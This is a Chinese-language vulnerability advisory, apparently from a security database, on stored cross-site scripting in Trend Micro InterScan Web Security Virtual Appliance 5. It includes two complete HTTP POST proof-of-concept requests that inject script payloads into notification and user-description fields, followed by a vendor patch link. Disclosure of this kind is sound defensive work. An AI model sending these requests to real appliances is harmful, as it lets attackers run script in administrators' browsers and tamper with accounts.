发布日期：2010-07-01
更新日期：2010-07-02

受影响系统：

Trend Micro InterScan Web Security Virtual Appliance 5

描述：

---

BUGTRAQ  ID: 41296

InterScan Web Security Virtual Appliance是一款能安装在VMware平台上的网页过滤产品。

InterScan Web Security Virtual Appliance没有正确地过滤用户所提交的desc、metrics__notify_body、metrics__notify_subject等参数便注入了新的用户，远程攻击者可以通过提交恶意参数请求执行存储式跨站脚本攻击。

<*来源：Ivan Huertas
  
  链接：http://marc.info/?l=full-disclosure&m=127800991307060&q=p5
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

1)

POST /servlet/com.trend.iwss.gui.servlet.MetricSetting HTTP/1.1

Host: xx.xx.xx.xx:1812

User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Proxy-Connection: keep-alive

Referer: xx.xx.xx.xx:1812

Cookie: JSESSIONID=95B512A600A8FC9FD989667E4D9DE8B3

Content-Type: application/x-www-form-urlencoded

Content-Length: 628



redirect_page=null&daemonaction=64&metrics__notifyadmin=00000&metrics__virus_threshold=15&metrics__virus_notification_period=30&metrics__spyware_threshold=15&metrics__spyware_notification_period=30&metrics__database_threshold=80&metrics__database_notification_period=30&metrics__hard_disk_threshold=80&metrics__hard_disk_notification_period=30&metrics__bandwidth_usage_threshold=50000&metrics__bandwidth_notification_period=60&metrics__notify_subject=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&metrics__notify_body=%25m+has+exceeded+%25t.+%3C%2Ftextarea%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%3Ctextarea%3E



2)

POST /login_account_add_modify.jsp HTTP/1.1

Host: xx.xx.xx.xx:1812

User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Proxy-Connection: keep-alive

Referer: xx.xx.xx.xx:1812

Cookie: JSESSIONID=8466E24FDCCB840BDE17D972210DA20E

Content-Type: application/x-www-form-urlencoded

Content-Length: 146



op=add&userid=consultor1&password_changed=true&PASS1=xxxx&PASS2=xxxx&desc=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&access_rights=reportonly

建议：

---

厂商补丁：

Trend Micro
-----------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=249&regs=NABU&lang_loc=1

浏览次数：2101
严重程度：0（网友投票）